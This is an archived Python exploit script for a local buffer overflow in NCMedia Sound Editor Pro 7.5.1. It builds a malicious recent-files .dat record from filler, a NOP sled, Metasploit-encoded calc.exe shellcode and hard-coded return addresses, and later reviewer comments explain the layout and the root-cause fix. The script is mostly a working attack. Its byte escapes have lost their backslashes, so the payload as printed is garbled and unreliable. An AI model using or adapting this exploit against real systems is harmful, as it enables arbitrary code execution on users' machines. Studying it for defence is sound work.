
# Title : NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Buffer Overflow
# Published : 2012-09-17
# Author :


#!/usr/bin/python
 
# Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow
# Version:       7.5.1
# Date:          2012-08-07
# Author:        Julien Ahrens
# Website:       http://www.inshell.net
# Software Link: http://www.soundeditorpro.com/
# Tested on:     Windows XP SP3 Professional German
# Howto:         Copy MRUList201202.dat to %appdata%Sound Editor Pro --> Launch app --> Click on "File" Menu

from struct import pack

# Name of the crafted recent-files list. Per the header above, the
# application loads this file from its own %appdata% folder when the "File"
# menu is opened, so the trigger needs write access to a per-user file:
# this is a local, file-handling vector, not a network one.
file="MRUList201202.dat"

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0dx0a'
#
# NOTE(review): the backslashes of the "\x.." escapes were dropped when this
# listing was archived, so every string below is plain ASCII text and the
# len() arithmetic further down no longer reflects the original byte counts.
# The bytes excluded by the -b list (NUL, CR, LF) are the usual string/line
# terminators -- presumably the app reads the file line by line; confirm
# against the parser.

shellcode = ("xd9xc7xbax2dxddx15x6dxd9x74x24xf4x58x29xc9" +
"xb1x33x31x50x17x03x50x17x83xedxd9xf7x98x11" +
"x09x7ex62xe9xcaxe1xeax0cxfbx33x88x45xaex83" +
"xdax0bx43x6fx8exbfxd0x1dx07xb0x51xabx71xff" +
"x62x1dxbex53xa0x3fx42xa9xf5x9fx7bx62x08xe1" +
"xbcx9exe3xb3x15xd5x56x24x11xabx6ax45xf5xa0" +
"xd3x3dx70x76xa7xf7x7bxa6x18x83x34x5ex12xcb" +
"xe4x5fxf7x0fxd8x16x7cxfbxaaxa9x54x35x52x98" +
"x98x9ax6dx15x15xe2xaax91xc6x91xc0xe2x7bxa2" +
"x12x99xa7x27x87x39x23x9fx63xb8xe0x46xe7xb6" +
"x4dx0cxafxdax50xc1xdbxe6xd9xe4x0bx6fx99xc2" +
"x8fx34x79x6ax89x90x2cx93xc9x7cx90x31x81x6e" +
"xc5x40xc8xe4x18xc0x76x41x1axdax78xe1x73xeb" +
"xf3x6ex03xf4xd1xcbxfbxbex78x7dx94x66xe9x3c" +
"xf9x98xc7x02x04x1bxe2xfaxf3x03x87xffxb8x83" +
"x7bx8dxd1x61x7cx22xd1xa3x1fxa5x41x2fxcex40" +
"xe2xcax0e")

# Record layout, in file order: 12 filler bytes, a 4-byte address from
# shell32.dll, a 20-byte NOP sled, the payload, filler that pads the record
# to a fixed 4108 bytes, and finally the 4 bytes that land on the saved
# return address. The fixed 4108 is the size the vulnerable copy accepts
# before the return address is reached (inferred from the layout; the
# parser itself is not visible here).
junk1="x41" * 12
nopsled="x90" * 20
junk2="x42" * (4108 - len(shellcode) - len(nopsled))
# Both addresses are hard-coded for the tested build (XP SP3 German, see
# header). A fixed address inside a system DLL presumes no ASLR on the
# target; with ASLR, or a rebased application image, neither value is stable.
# Defensive note: the underlying defect is the application copying an
# attacker-controlled record from the MRU file into a fixed-size buffer
# without checking its length (presumably a stack buffer, given the
# return-address overwrite -- confirm). Validating the record length before
# the copy, or using a bounded copy, closes the issue independently of
# these addresses; DEP/ASLR only raise the bar.
eip=pack('<L',0x004d893e) # ADD ESP,404 # POP EDI # POP ESI # RETN from SoundEditorPro.exe
esp=pack('<L',0x7e8236d9) # CALL ESP from shell32.dll

# Assemble the record in the order described above.
poc=junk1 + esp + nopsled + shellcode + junk2 + eip 

# Write the record to the current directory. Python 2 syntax (print
# statement); the trailing "n" in the first message is a newline escape
# that lost its backslash in this copy. The bare except below swallows the
# actual error (permissions, read-only location, ...) without reporting it,
# so a failure is indistinguishable from a wrong working directory.
try:
    print "[*] Creating exploit file...n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"